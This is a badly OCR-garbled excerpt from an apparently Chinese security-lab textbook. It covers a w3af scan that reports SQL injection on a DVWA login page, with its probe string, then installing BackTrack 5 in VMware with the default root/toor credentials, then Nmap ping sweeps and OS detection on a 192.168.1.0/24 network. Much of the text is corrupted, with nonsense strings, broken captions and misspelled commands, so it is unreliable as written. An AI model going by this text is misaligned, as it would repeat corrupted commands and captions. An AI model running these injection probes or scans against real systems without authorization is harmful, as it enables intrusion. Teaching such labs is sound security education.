Auto- enabling plugin: grep.getMails 

Auto- enabling plugin: grep.lang 


行 设 定 。 
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New URL found by WebSpider plugin: http://ww.dvssc.can/dvwa/ 


Found 26 URLs and 27 different points of injection. 
The list of URLs is: 


The list of fuzzable requests is: 
Password profiling TOP 100: 


Scan finished in 5 seconds. 


可 以 看 到 扫描 总 共用 时 5s, 基 本 信息 通过 刚才 设置 的 HTML 文件 查询 。 
从 w3af 的 文件 夹 中 可 以 看 到 名 为 track. html 的 文件 , 即 在 输出 模块 设置 的 文件 名 ,如 
图 7.2.1 所 示 。 


w3af console w3af qui 


图 721 wi 模块 扫描 后 输出 troeh 文件 


从 浏览 器 中 打开 ,可 以 看 到 扫描 后 的 详细 信息 已 经 在 html 文件 中 列 了 出 来 ,如 图 7.2.2 
和 图 7. 2. 3 所 示 。 


Vulnerability tcp/80 SQL injection in a MySQL database was found at: "http://www.dvssc.com/dvwa/login.php", 
using HTTP method POST. The sent post-data was: "username-d'z"0&Login-Login& 
password-FrAmE30.". The modified parameter was "username". This vulnerability was. 
found in the request with id 311. 


URL : htip://www.dvssc.com/dvwa/login.php. 

Severity : High 

Information ltcp/80 EOL ecto a MOL daabese was Fund at cive dec comi vallo eh 
using HTTP method POST. The sent post-data was: "username=d'z"0&Login=| 
password=FrAmE30.”. The modified parameter was "username". T VERUM wed 
found in the request with id 311. 


URL : http:/Awww.dvssc.com/dvwa/login.php 


图 722 tracehimi 文件 的 详细 信息 1 
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Time 


Fri 27 May 2016 
11:33:10 AM EDT 


Fri 27 May 2016 
11:33:11 AM EDT 


图 723 trecehtmi 文件 的 详细 信息 2 
实验 报告 要 求 


。 写 明 实 验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阅 述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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第 8 音 主机 探测 及 端口 扫描 实验 


8.1 Windows 操作 系统 探测 及 端口 扫描 实验 


实验 器 材 


Back Track5 的 镜像 文件 ,1 E. 
VMware 虚拟 机 软件 ,1 套 。 
PC,1 fi. 


实验 任务 


一 台 安 装 了 VMware 虚拟 机 软件 的 Windows 7 操作 系统 的 计算 机 ,BT5(Back Track 
five) 系 统 。 


实验 环境 


一 台 安 装 Windows 7 操作 系统 的 计算 机 ,磁盘 格式 配置 为 NTFS, 预 装 MBSA (Microsoft 
Baseline Security Analyzer) 工 具 。 


预备 知识 


(1) ARP( 地 址 解析 协议 ) 。 
(2) RARP( 逆 地 址 解析 协议 ) 。 
(3) ICMPCnternet 控制 报 文 协议 ) 。 


实验 步骤 


因为 本 实验 介绍 的 主机 探测 及 其 端口 扫描 使 用 的 是 Back Track5 中 的 Metasploit 开源 
工具 ,因此 ,下 面 先 介绍 一 下 在 Windows 7 操作 系统 的 计算 机 中 使 用 VMware 虚拟 机 软件 
安装 Back Track5 的 步骤 。 

本 实验 使 用 的 VMware 虚拟 机 版 本 为 VMware Workstation 12 ,使 用 Back Track5 。 


8.2 Back Tracks 系统 的 安装 


安装 Back Track5 系统 的 详细 步骤 如 下 。 
CD 打开 VMware 虚拟 机 软件 .出现 安装 向 导 窗 口 ,如 图 8. 2.1 所 示 。 
(2) 单 击 “ 创 建新 的 虚拟 机 ”, 出 现 “ 新 建 虚拟 机 向 导 ”, 如 图 8. 2. 2 所 示 ,通过 本 向 导 创 
建 一 个 新 的 虚拟 机 。 
(3) 在 配置 类 型 中 选择 “ 自 定义 (高 级 )(C)”,. 单 击 “ 下 一 步 ” 按 钮 ,出 现 如 图 8. 2. 3 所 示 
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Q miim. + 


[ETE 
M] Gammese 


图 821 安装 向 导 窗 口 


新 建 虚拟 机 向 导 (emt) 
欢迎 使 用 新 建 虚拟 机 向 导 
WORKSTATION. 您 希望 使 用 什么 类 型 的 可 置 ? 
^ READ 


通过 几 个 简单 的 步骤 创建 Workstation 12.0 
虚拟 机 。 


e Ere x GER XC) 
Ger SCSI PARAT, teinte nt 
LR VMware eat EE 


< 上 -上 (8) | [sean 
图 822 新 建 虚拟 机 向 导 


的 “选择 虚拟 机 硬件 兼容 性 ?界面 。 

(4) 在 “选择 虚拟 机 硬件 兼容 性 ”中 选择 默认 的 硬件 兼容 性 , 即 Workstation 12. 0 的 硬 
件 兼容 性 , 单 击 “ 下 一 步 ” 按 钮 ,出 现 如 图 8. 2.4 所 示 的 “安装 客户 机 操作 系统 ”界面 。 

(5) 选择 “ 稍 后 安装 操作 系统 (S)” 选 项 ,并 单 击 “ 下 一 步 ” 按 钮 ,出 现 如 图 8. 2. 5 所 示 的 


“选择 客户 机 操作 系统 ”界面 。 
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FENNAS 


选择 虚拟 机 硬件 兼 音 性 
该 虚拟 机 需要 何 种 硬件 功能 ? 
虚拟 机 硬件 兼容 性 
PERRE: 
RE: [7] ESX Server(S) 
REAR: 限制: 
Fusion 8.x ^ 64 GB 内存 = 
Workstation 12.0 16 个 处 理 器 
10 个 网 络 
8 TB 碰 盘 大 小 


图 823 锣 择 虚拟 机 硬件 兼容 性 ”界面 


RECS 
安装 客户 机 操作 系统 
虚拟 机 如 同 物 理 机 ， 怖 要 操作 系统 。 您 如 何 安装 客户 机 操作 系统 ? 


安装 来 源 : 
日 安装 程序 光盘 (D): 
[eld ovo aipa (E:) -] 


O 安装 程序 光盘 映像 文件 (soXM): | 
[pip 下 载 WaHnux2016.1amd64\alinux-2016.13m -] [ MAR... ] 


© 消 后 安装 操作 系统 (5j。] 
mewn ans -trag 


( am ) < 上 一步 (8) ] [下 一步 (N) > | [取消 | 


图 824 ”安装 客户 机 操作 系统 ”界面 


(6) 因为 BT5 是 基于 Ubuntu Lucid LTS. Kernel 2. 6. 38 的 ,因此 在 “客户 机 操作 系统 ” 
选项 中 选择 “Linux(L)”, 在 “版 本 ?选项 中 选择 “Ubuntu 64 位 ”, 单 击 “ 下 一 步 ” 按 钮 ,出 现 如 
图 8.2.6 所 示 的 “命名 虚拟 机 ”界面 。 

(7) 在 “虚拟 机 名 称 (V)” 选 项 中 输入 虚拟 机 的 名 称 , 本 实验 使 用 的 是 BT5。 在 “位 置 
(LL)” 选 项 中 为 虚拟 机 选择 一 个 安装 目录 ,本 实验 使 用 的 是 “D:\Program Files (x86) \ 
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选择 客户 机 操作 系统 


此 虚拟 机 中 将 安装 哪 种 操作 系统 ? 


— ' 


新 建 虚拟 机 向 导 


图 825 ” 链 择 客户 机 操作 系统 ”界面 


LI 


名 虚拟 机 
您 要 为 此 虚拟 机 使 用 什么 名 称 ? 


庶民 机 名 称 (WD): 
BT5 


RAY: 


D:\Program Fies (x86)\vmware\BTS| 
在 编辑 "> 首选 项 "中 可 更 改 默 认 位 置 


«E—5 | | 下 一 步 (N) > 


图 826 


‘eS eH” AE 


vmware\BT5” 安 装 目 录 , 单 击 “ 下 一 步 ” 按 钮 ,出 现 如 图 8. 2. 7 所 示 的 “处 理 器 配置 ?界面 。 
(8) 可 以 根据 自己 实验 平台 的 硬件 条 件 自 行 决定 “处 理 器 数量 (P)” 以 及 “每 个 处 理 器 的 
核心 数量 (C) ”的 具体 值 。 本 实验 使 用 的 是 默认 值 , 单 击 “ 下 一 步 ? 按 钮 ,出 现 如 图 8. 2. 8 所 


示 的 “此 虚拟 机 的 内 存 ” 界 面 。 


(9) 在 “此 虚拟 机 的 内 存 (M) ?选项 中 同样 可 以 根据 自己 实验 平台 的 硬件 条 件 ,为 虚拟 
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图 827 “处理 器 配置 "界面 


新 建 虚拟 机 向 导 


此 虚拟 机 的 内 存 
您 要 为 此 虚拟 机 使 用 多 少 内 存 ? 


指定 分 配给 此 虚拟 机 的 内 存量 。 内 存 大 小 必须 为 4 MB 的 倍数 * 


此 虚拟 机 的 内 存 (M): 


1024 [$] MB 


512 MB 


NC NN 


= 


<£-#(8) | | 下 一 步 (N) > 


图 828 EUNHA” 界面 


机 设置 内 存 大 小 。 本 实验 选用 的 是 “1024MB”, 单 击 * 下 一 步 ? 按 钮 ,出 现 如 图 8. 2. 9 所 示 的 


“网 络 类 型 界面 。 


(0) 在 “网 络 连接 ”选项 中 为 虚拟 机 选择 “使 用 网 络 地 址 转换 NAT CE) "模式 , 单 击 “下 


一 步 ” 按 钮 ,出 现 如 图 8. 2. 10 所 示 的 “选择 1/O 控制 器 类 型 "界面 。 


(11) 在 “SCSI 控制 器 ?选项 
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中 选择 软件 推荐 的 “LST Logic(L)”, 单 击 “ 下 一 步 ” 按 钮 ,出 


O 使 用 桥接 网 络 (R) 
为 客户 机 操作 系统 提供 直接 访问 外 部 以 太 网 网 络 的 权限 。 客户 机 在 外 部 网 络 上 必须 
LEE 


(© 使 用 网 络 地 址 转换 (NAT)(E) 
Bep LARES LUCERE P 地 址 访问 主机 拨号 连接 或 外 部 以 太 网 网络 连接 的 


CO 使 用 仅 主机 模式 网 络 (H) 
将 客户 机 操作 系统 连接 到 主机 上 的 专用 虚拟 网 络 * 


日 不 使 用 网 络 连 接 (了 ) 


图 829 网 络 连 接 设置 


新 建 虞 拟 机 向 导 


选择 1/0 控制 器 类 型 
您 要 使 用 何 种 类 型 的 SCSI 控制 器 ? 


Vo 控制 器 类 型 
SCSI 控制 器 : 
BusLogkc(U) 《不 适用 于 64 位 客户 机 ) 
@LSILogic(L) (推荐 ) 
© LSI Logic SAS(S) 


Ca «E-5) | [ 5500» 取消 | 


图 8210 KH I/O 控 制 器 类 型 "界面 


现 如 图 8. 2. 11 所 示 的 “选择 磁盘 类 型 "界面 。 

(12) 在 “虚拟 磁盘 类 型 "选项 中 同样 选择 软件 推荐 的 “SCSI(S) "选项, 单 击 “ 下 一 步 " 按 
钮 ,出 现 如 图 8. 2. 12 所 示 的 “选择 磁盘 ”界面 。 

(13) 在 “磁盘 ”选项 中 选择 “创建 新 虚拟 磁盘 (V)” 模 式 , 单 击 “ 下 一 步 ” 按 钮 ,出 现 如 
图 8. 2. 13 所 示 的 “指定 磁盘 容量 "界面 。 
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© DEN) 
€ SCSHMS) (推荐 ) 
© SATA(A) 


CHL [sem] [mw] C | 


图 8211 ” 链 择 磁盘 类 型 界面 


新 建 虚拟 机 向 导 


择 磁盘 
您 要 使 用 哪个 磁盘? 


磁盘 
© arp dett (V) 


虚拟 说 盘 由 主机 文件 系统 上 的 一 个 或 多 个 文件 组 成 ， 客 户 机 操作 系统 会 将 其 视 为 单 
个 酉 盘 。 虚 拟 琉 盘 可 在 一 台 主 机 上 或 多 台 主 机 之 间 径 松 夏 制 或 移动 。 


O 使 用 现 有 虚拟 磁盘 (E) 
选择 此 选项 插 重 新 使 用 之 前 配置 的 磁盘 。 


O 使 用 物理 磁盘 (适用 于 高 级 用 户 )(P) 
选择 此 选项 将 为 虚拟 机 提供 直接 访问 本 地 硬盘 的 权限 * 


Ca «E-5) | [ 7—500» 取消 | 


Hi8210 MERE” RE 


(14) 在 “最 大 磁盘 大 小 (GB)(S) ?选项 中 同样 使 用 软件 建议 的 20.0GB 大 小 ,当然 ,大 小 
可 以 根据 自己 的 硬件 条 件 进行 调整 。 不 建议 勾 选 “ 立 即 分 配 所 有 磁盘 空间 ”, 因 为 根据 使 用 
大 小 再 分 配 磁盘 空间 大 小 完全 够 用 ,并 不 会 影响 使 用 效果 。 接 下 来 选中 “将 虚拟 磁盘 拆 分 成 
多 个 文件 (M) ”选项 , 单 击 “ 下 一 步 ” 按 钮 ,出 现 如 图 8.2. 14 所 示 的 “指定 磁盘 文件 ”界面 。 

(15) 在 “磁盘 文件 ”中 同样 选择 软件 默认 的 文件 名 称 和 磁盘 文件 存储 地 址 , 单 击 “ 下 一 
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FENNAS 


ERATE 
磋 盘 大 小 为 多 少 ? 


最 大 磁盘 大 小 (GB)(S): 20.0 =) 


卦 对 Ubuntu 64 位 的 建议 大 小 : 20 GB 


国立 即 分 配 所 有 磁盘 空间 (A)。 


分 本 所 有 容 里 可 以 提高 性 能 ， EC SEE 如 果 不 立 即 分 配 
所 有 空间 ， 虚 拟 磁 盘 的 空间 最 初 很 小 ， 会 随 着 您 向 其 中 添加 数据 而 不 断 变 大 。 


C 将 虚拟 磁盘 存 侍 为 单个 文件 (9) 
O 将 虚拟 磁盘 拆 分 成 多 个 文件 (M) 
pauan 可 以 更 轻松 地 在 计算 机 之 间 移 动 虚 拟 机 ， 但 可 能 会 降低 大 容量 磁盘 的 


图 8213 EMAAR" 界面 
RECS 
指定 磁盘 文件 
您 要 在 何 处 存 针 磁盘 文件 ? 
磁盘 文件 
将 为 每 2 GB 容 里 的 虚拟 开盘 创建 一 个 说 盘 文件 。 除 第 一 个 文件 之 外 ， 每 个 文件 的 文件 
名 称 挡 根据 此 处 所 提供 的 文件 名 称 自动 生成 。 
Sm 


«E-58)(r—500» ]( Aw | 


图 8214 ”特定 磁盘 文件 "界面 


步 ? 按 钮 ,软件 会 提示 你 已 准备 好 创建 虚拟 机 ,如 图 8. 2.15 所 示 。 
(16) 在 图 8. 2. 15 中 单 击 “ 自 定义 硬件 ”按钮 ,出 现 如 图 8. 2. 16 所 示 的 “硬件 ”界面 。 
(17) 选择 “设备 ”中 的 “新 CD/DVD(SATA)”, 并 在 右 侧 的 “连接 ”部 分 选择 “使 用 IOS 
映像 文件 (M)”, 通 过 单 击 “ 浏 览 ” 按 钮 选中 BT5 镜像 文件 地 址 ,如 图 8. 2. 17 所 示 , 单 击 “ 关 
闭 ” 按 钮 。 
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新 建 谨 拟 机 向 导 


已 准备 好 创建 虚拟 机 
FEH ER CEREN. RELL Ubuntu 64 位 。 

将 使 用 下 列 设 置 创建 虚拟 机 : 

名 称 : BTS 

位 置 : D:\Program Fies (x86)\vmware\BTS: 

版 本 : ‘Workstation 12.0 

操作 系统 : Ubuntu 64 位 

ga: 20 GB, 拆 分 | 

内 存 : 1024 MB | 

d NAT 

其 他 设备 : CD/DVD, USB 控制 器 , 打印 机 , 声卡 
(sexier. |] 


kisa) C zm ) 


图 8215 它 准 备 好 创建 虚拟 机 ”界面 


内 存 
存 指定 分 配给 此 虚拟 机 的 内 存量 。 内 存 大 小 必须 为 4 MB 
BES] 1 feti E 
网 新 CD/DVD (SAT... Ezhi i 1024) me 
网 网 络 适配器 NAT RERO: B 
Buse jews 存在 we 
ORF Bibl pd 
arm jue 16GB 
Gare Sinem = — 
48 (超出 此 大 小 可 能 
2@ | 发 生 内 存 交接 。) 
1e qq 3024MB 
MEL 
1024 MB 
128 MB 
oe D 建议 的 最 小 客户 机 操作 系统 内 存 
512 MB 
16M8 
am 
4MB 
d) 让 以 机 最 多 将 此 内 存 的 766 MB 用 作 图 形 内 存 。 您 可 以 
md CRAMP EAE 
[ETE] 


图 8216 "Eft" 


(18) 回 到 刚才 的 “已 准备 好 创建 虚拟 机 ”界面 ,如 图 8. 2. 18 所 示 , 再 次 单 击 “ 完 成 ” 按 
钮 ,完成 虚拟 机 的 创建 。 
(19) 可 以 看 到 ,软件 新 建 选项 卡 中 已 经 出 现 了 新 创建 的 名 为 BTS 的 虚拟 机 , 单 击 “ 开 
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设备 状态 
口 己 连接 (GO 
启 s 加 连接 (0) 


连接 
© HAMBEZ): 

ED -] 
Lir 自动 检测 9 使 用 ISO 映像 文件 (M): 


Di\BaduYunDownload\B75- ~ EG) 
U ERV)... 


图 8217 新 CDDVO(SATA) 


superius me 


已 准 备 好 创建 虚拟 机 | 
ME 完成 他 键 虚拟 机 。 然 后 可 以 安装 Ubuntu 64 位 。 


将 使 用 下 列 设置 创建 虚拟 机 : 
名 称 : BTS 
dus: D:\Program Files (x86)\vmware\BTS: 
版 本 : Workstation 12.0 
操作 系统 : Ubuntu 64 位 
wa: 20 GB, 拆 分 
内 存 : 1024 MB 
网 络 适 配器 : NAT 
其 他 设备 : CD/DVD, USB 控制 器 , 打印 机 , 声卡 


A828 返回 它 准备 好 创建 虚拟 机 ”界面 继续 安装 


启 此 虚拟 机 ”, 开 启 虚 拟 机 ,如 图 8. 2. 19 所 示 。 
(20) 稍 等 片刻 出 现 如 图 8. 2. 20 所 示 的 界面 后 ,直接 按 回 车 键 , 即 选中 第 一 个 选项 , 进 
AF-#. 
(21) 在 命令 行 中 输入 startx 命令 ,启动 桌面 系统 ,如 图 8. 2.21 所 示 。 
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B) BT5 - VMware " aas ARS Abs Bas 
(B) 8T5 - VMware Workstation aa a ald 
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REICH: D:\Program Files (x86)\vmware\BTS\BTS.vmx 
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图 8219 开启 虚拟 机 


BTS - VMware Workstation 
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Press [Tab] to edit option 


futomatic boot in 18 second 
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ET EI] 


8220 进入 系统 


BackTrace 安装 软件 ,双击 该 软件 图 标 ,启动 此 安装 软件 。 
(23) 如 图 8. 2. 23 所 示 ,首先 选 择 安装 的 语言 。 
语言 中 选择 “中 文 (简体 )”, 并 单 击 “ 前 进 ” 按 钮 。 
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(22) 可 以 看 到 此 时 已 经 进入 了 桌面 系统 。 如 图 8.2.22 Bron ,桌面 上 有 


-个 Install 


BTS 已 经 支持 中 文安 装 , 因 此 从 左边 的 


<< back track 


Ex] Uelcone to the BackTrack 5 Distribution, Codename "Revolution" 


E=] Official BackTrack Home Page: http: 7m, backtrack-linax.org 


E=] Official BackTrack Tre Lp: z^ of ens ive-socur Lj. con 
人 人 人手 


[x] To start a graphical interface, type " E 
Je] The default root password is ” ^ 


costante 


Ei ess Mie id 


图 8221 启动 桌面 系统 


BTS -VMware Workstation lole mE 
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Mon May 2, 1:28 AM 
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图 8222 双击 Install BackTrack 


欢迎 
准备 好 安装 了 吗 ? 一 旦 您 完成 回答 几 个 问题 , 这 张 ve CD 上 的 内 容 


就 可 以 被 安装 到 这 台 计算 机 上 、。 这样 您 便 可 以 不 再 需要 这 张 CD ， 并且 
以 全 过 来 运行 BackTrack Live. 
回答 这 些 问题 仅 需要 几 分 钟 时 间 - 
amit 
pred 
p 
aermogo. 
imnlnu 
gao 
(SH) 
BAR 


第 1 步 ( 共 7 步 ) 


图 8223 初始 化 安装 设置 


(24) 选择 自己 所 在 的 地 区 与 时 区 。 不 过 ,软件 在 安装 中 会 自动 识别 你 所 在 的 地 区 与 时 
区 ,一 般 比 较 准确 ,如 果 与 自己 所 在 的 地 区 或 时 区 有 误差 ,使 用 下 拉 列 表 自 行 矫 正 即 可 ,如 
图 8. 2. 24 所 示 , 单 击 “ 前 进 " 按 钮 。 


您 在 什么 地 方 ? 


请 选择 您 的 位 置 ， 以 便于 系统 使 用 符合 您 所 在 国家 习惯 的 显示 信息 ， 从 离 您 较 近 的 站 点 接受 更 新 ， 
并 且 设 置 正确 的 本 地 时 间 。 


地 区 : | 亚洲 | y | SEIT 


3250072) [Bso || me || aee 


图 8224 区 域 设置 


(25) 选择 合适 的 键盘 布局 ,这 里 选择 系统 默认 的 USA 键盘 布局 ,如 图 8. 2. 25 Bros , 单 
击 “ 前 进 ” 按 钮 。 


键盘 布局 
最 适合 您 的 键盘 布局 ? 
© 医 议 的 选项 :| USA 


〇 猜测 键盘 布局 : 


O 选择 您 的 : 


您 可 以 在 框 内 测试 您 的 新 键盘 布局 , 


335007 8) ETCEEETEE 3 


图 822 键盘 布局 设置 


。 同 样 选择 系统 默认 的 选项 。 如 图 8.2.26 所 示 , 单 击 “ 前 进 ” 按 钮 。 


准备 硬盘 空间 


这 台 计 算 机 没有 安装 操作 系统 , 


您 要 将 BackTrack Live 安装 在 哪里 了 
O 清空 并 使 用 整个 硬盘 


| Scsi33 (0,0,0) (sda) - 21.5 GB VMware, VMware Virtual S 
O 手动 指定 分 区 (高 级 ) 


一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 
Ill BackTrack Live 


第 4 步 ( 共 7 步 ) | aso || mae |) 


图 8226 准备 硬盘 空间 


装 前 再 次 进行 确认 ,如 图 8.2.27 所 示 。 此 时 直接 单 击 “安装 ”按钮 


27) 在 准备 开始 安 
med 


准备 开始 安装 


您 的 新 操作 系统 将 会 使 用 下 列 选项 安装 : 


语言 : 中 文 (简体 ) 
键盘 布局 : USA 
全 名 

BRE: 

10 : Asia/Harbin 
迁移 助手 : 


如 果 您 继续 ， 以 下 所 列 出 的 修改 内 容 将 被 写 入 磁盘 。 否则 您 将 可 以 进行 进一步 的 手动 修改 。 


第 7 步 ( 共 7 步 ) | aso || maw || xm 


图 822 安装 开始 
对 Ubuntu 进行 测试 , 单 击 “ 现 在 重启 ”按钮 ， 


(28) 安装 结束 后 会 提示 你 重启 ,或 是 
直接 重启 系统 ,如 图 8. 2. 28 所 示 。 


安装 已 经 完成 。 您 可 以 继续 测试 Ubuntu ， 但 是 重启 前 任何 
您 做 的 更 改 以 及 保存 的 文档 都 不 会 保留 。 


snme | | meme 


8228 安装 完成 重启 


(29) 重启 系统 后 ,默认 进入 的 是 命令 行 模式 ,并 需要 你 先 登 录 。“ 登 录 ” 界 面 如 图 8. 2. 29 
所 示 ， 创建 成 功 后 ， RR root 登录 名 称 为 root, 登 录 密 码 为 toor。 在 命令 行 中 输入 用 
PAOHERSUE ARRRGART ABA RENEE LEIA SA AIREAN 
输入 的 密码 正确 ,输入 后 按 回 车 键 。 

(30) 登录 成 功 后 ,同样 使 用 startx 命令 ,直接 进入 桌面 系统 ,如 图 8. 2. 30 所 示 。 

(3D 此 时 ,BT5 的 系统 已 经 全 部 安装 完毕 。 配 置 完 成 界面 如 图 8. 2. 31 所 示 。 
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图 8231 配置 完成 界面 


8.3 Nmap 网 络 扫 描 工 具 


Metasploit 中 提供 了 一 些 辅助 模块 用 于 发 现 活跃 的 主机 ,而 BTS 中 已 经 集成 了 
Metasploit 软件 。 
CD 启动 Metasploit, 如 图 8.3.1 所 示 。 在 BTS 的 终端 中 输入 下 面 的 命令 ， 


root@ bt:~# msfoonsole 


stall BackTrack 


831 启动 Mtasplcit 
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(2) Nmap(Network mapper) 是 目前 最 流行 的 网 络 扫描 工具 , 它 不 仅 能 够 准确 地 探测 
台 主 机 的 详细 情况 ,而 且 能 够 高 效率 地 对 大 范围 的 IP 地 址 段 进 行 扫描 。 使 用 Nmap 能 够 
得 知 目标 网 络 上 有 哪些 主机 是 存活 的 ,哪些 服务 是 开放 的 ,甚至 知道 网 络 中 使 用 了 何 种 类 型 
的 防火 墙 设备 等 。 
Nmap 的 参数 和 选项 很 多 ,功能 也 很 丰富 。 通 常 , 一 个 Nmap 命令 的 格式 如 下 。 


ms 他 mmap< 扫 描 选 项 >< 扫 描 目标 > 


其 中 ,扫描 选项 是 用 来 制定 扫描 方式 的 。 扫 描 目 标 一 般 是 用 点 分 十 进 制 格式 表示 的 一 个 IP 
或 者 一 段 IP 地 址 。 如 果 仅 对 一 台 主 机 进行 扫描 ,可 以 使 用 一 个 IP 地 址 作为 扫描 范围 ;如 果 
是 多 个 IP 地 址 ,可 以 使 用 逗号 分 隔 开 ; 如 果 是 一 段 连续 的 TP 地 址 ,可 以 使 用 连 字 符号 (-) 表 
示 , 如 192. 168. 1. 1-192. 168. 1. 100 ,或 使 用 无 类 型 域 间 选 路 地 址 块 (CIDR) 表 示 , 如 192. 
168. 1. 0/24, 

(3) 使 用 -sn 扫描 选项 。 

-sn 选项 会 使 用 ICMP 的 Ping 扫描 获取 网 络 中 的 存活 主机 情况 ,而 不 会 进一步 探测 主 
机 的 详细 情况 。 

输入 下 面 的 命令 行 。 

msf> nmap - sn 192.168.1.0/24 


得 到 的 Nmap 扫描 结果 如 下 。 


[* ] exec: rmap - sn 192.168.1.0/24 
Starting Nmap 5.51SVN (http://rmap.org) at 2016- 05- 02 20:21 CST 
RTIVAR has grown to over 2.3 seconds, decreasing to 2.0 
Nmap scan report for 192.168.1.0 
Host is up (0.00031s latency). 
Nrap scan report for 192.168.1.1 
Host is up (0.0165 latency) . 

Nmap scan report for 192.168.1.2 
Host is up (0.014s latency). 

Nrap scan report for 192.168.1.4 
Host is up (0.0165 latency) . 

Nmap scan report for 192.168.1.5 
Host is up (0.016s latency). 

Nmap scan report for 192.168.1.12 
Host is up (2.65 latency). 

Nmap scan report for 192.168.1.15 
Host is up (0.0013s latency). 

Nmap scan report for 192.168.1.24 
Host is up (0.00025s latency) . 
Nmap scan report for 192.168.1.25 
Host is up (0.0041s latency). 

Nmap scan report for 192.168.1.27 
Host is up (0.00024s latency) . 
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Nmap scan report for 192.168.1.31 
Host is up (0.0014s latency). 

Nmap scan report for 192.168.1.33 
Host is up (0.00195 latency). 

Nrep scan report for 192.168.1.90 
Host is up (0.00019s latency). 
Nrap scan report for 192.168.1.9? 
Host is up (0.00023s latency) . 
Nmap scan report for 192.168.1.97 
Host is up (0.000099s latency). 
Nmap scan report for 192.168.1.100 
Host is up (0.043s latency). 

Nmap scan report for 192.168.1.101 
Host is up (0.00013s latency). 
Nmap scan report for 192.168.1.103 
Host is up (0.0625 latency) . 

Nrep scan report for 192.168.1.107 
Host is up (0.062 latency) . 

Nmap scan report for 192.168.1.108 
Host is up (0.00021s latency). 
Nmap scan report for 192.168.1.109 
Host is up (0.00049s latency). 
Nmap scan report for 192.168.1.111 
Host is up (0.0022s latency). 
Nmap scan report for 192.168.1.117 
Host is up (0.00057s latency) . 
Nmap scan report for 192.168.1.121 
Host is up (0.00075s latency). 
Nrap scan report for 192.168.1.125 
Host is up (0.00012s latency). 
Nap scan report for 192.168.1.126 
Host is up (0.00045s latency). 
Nmap scan report for 192.168.1.136 
Host is up (0.000105 latency). 
Nmap scan report for 192.168.1.140 
Host is up (0.00026s latency) . 
Nmap scan report for 192.168.1.143 
Host is up (0.00020s latency) . 
Nmap scan report for 192.168.1.156 
Host is up (0.024s latency). 

Nmap scan report for 192.168.1.160 
Host is up (0.046s latency) . 

Nmap scan report for 192.168.1.162 
Host is up (0.00060s latency). 
Nmap scan report for 192.168.1.172 
238 。 


Host is up (0.00060s latency). 
Nmap scan report for 192.168.1.175 
Host is up (2.65 latency). 

Nmap scan report for 192.168.1.177 
Host is up (0.00024s latency) . 
Nmap scan report for 192.168.1.181 
Host is up (2.6s latency). 

Nmap scan report for 192.168.1.184 
Host is up (0.00020s latency) . 
Nmap scan report for 192.168.1.189 
Host is up (2.6s latency). 

Nmap scan report for 192.168.1.190 
Host is up (0.00040s latency). 
Nmap scan report for 192.168.1.195 
Host is up (2.65 latency). 

Nmap scan report for 192.168.1.198 
Host is up (0.00017s latency). 
Nmap scan report for 192.168.1.199 
Host is up (2.65 latency). 

Nmap scan report for 192.168.1.202 
Host is up (2.65 latency). 

Nrap scan report for 192.168.1.209 
Host is up (0.00014s latency). 
Nrap scan report for 192.168.1.212 
Host is up (2.65 latency). 

Nmap scan report for 192.168.1.215 
Host is up (0.000995 latency). 
Nrep scan report for 190.168.1.226 
Host is up (0.00028s latency). 
Nrep scan report for 192.168.1.229 
Host is up (2.6s latency). 

Nrap scan report for 192.168.1.235 
Host is up (0.0069s latency). 

Nrap scan report for 192.168.1.240 
Host is up (0.00013s latency). 
Nrap scan report for 192.168.1.245 
Host is up (2.6s latency). 

Nmap scan report for 192.168.1.249 
Host is up (0.00035s latency) . 
Nmap scan report for 192.168.1.250 
Host is up (0.018s latency). 

Nmap scan report for 192.168.1.253 
Host is up (2.65 latency). 

Nmap scan report for 192.168.1.255 
Host is up (0.0014s latency). 
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Nmap done: 256 IP addresses (55 hosts up) scanned in 27.66 seconds 


可 以 看 到 ,在 不 到 30s 的 时 间 内 ,Nmap 工具 从 192. 168. 1. 0 到 192. 168. 1. 255 的 地 址 
区 间 内 扫描 到 了 55 个 活路 的 主机 。 

(4) 使 用 -O 扫描 选项 。 

-O 扫描 选项 会 让 Nmap 扫描 软件 对 被 扫描 目标 的 操作 系统 进行 识别 。 

输入 下 面 的 命令 行 。 


ms nmap -O 192.168.1.0 
得 到 的 O 扫描 结果 如 下 。 


[* ] exec: nmap -O 192.168.1.0 

Starting Nmap 5.51SVN (http://rmap.org) at 2016- 05- 02 21:06 CST 

Nmap scan report for 192.168.1.0 

Host is up (0.00030s latency). 

All 1000 scanned ports on 192.168.1.0 are filtered 

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 

Device type: general purpose 

Running: Microsoft Windows 200817 

OS details: Microsoft Windows Server 2008 SPl, Microsoft Windows 7 Enterprise 

OS detection performed. Please report any incorrect results at http: //rmep.org/sumit/. 

Nmap done: 1 IP address (1 host up) scanned in 52.87 seconds 

可 以 看 到 ,IP JU hE Jy 192. 168. 1. 0 的 机 器 的 操作 系统 细节 为 Microsoft Windows 
Server 2008 SP1,Microsoft Windows 7 Enterprise。 

(5) 大 部 分 扫描 器 将 端口 分 为 open OT JO) I closed( 关 闭 ) 两 种 类 型 ,而 Nmap 对 端口 
状态 的 分 析 粒 度 更 加 细致 ,其 将 端口 分 为 6 个 状态 : open( 开 放 )、closed( 关 闭 ) filtered CBE 
TUE) .unfiltered( 未 过 滤 ) .open|filtered( 开 放 或 被 过 滤 ) ~ closed | filtered OE B] X PK iE UE) 。 
下 面 对 这 几 种 端口 状态 进行 说 明 。 

open: 一 个 应 用 程序 正在 此 端口 上 进行 监听 ,以 接收 来 自 TCP、UDP 或 SCTP 的 数据 。 
这 是 在 渗透 测试 中 最 关注 的 一 类 端口 ,开放 端口 往往 能 够 为 其 提供 一 条 能 够 进入 系统 的 攻 
击 路 径 。 

closed; 关闭 的 端口 指 的 是 主机 已 响应 ,但 没有 应 用 程序 监听 的 端口 。 这 些 信息 并 非 毫 
无 价值 ,扫描 出 关闭 端口 至 少 说 明 主 机 是 活跃 的 。 

filtered: 指 Nmap 不 能 确认 端口 是 否 开放 ,但 根据 响应 数据 猜测 该 端口 可 能 被 防火 墙 
等 设备 过 滤 。 

unfiltered: 仅 在 使 用 ACK 扫描 时 ,Nmap 无 法 确定 端口 是 否 开 放 会 归 为 此 类 。 可 以 使 
用 其 他 类 型 的 扫描 (如 Window 扫描 ,SYN 扫描 、FIN 扫描 ) 进 一 步 确 认 端 口 的 信息 。 

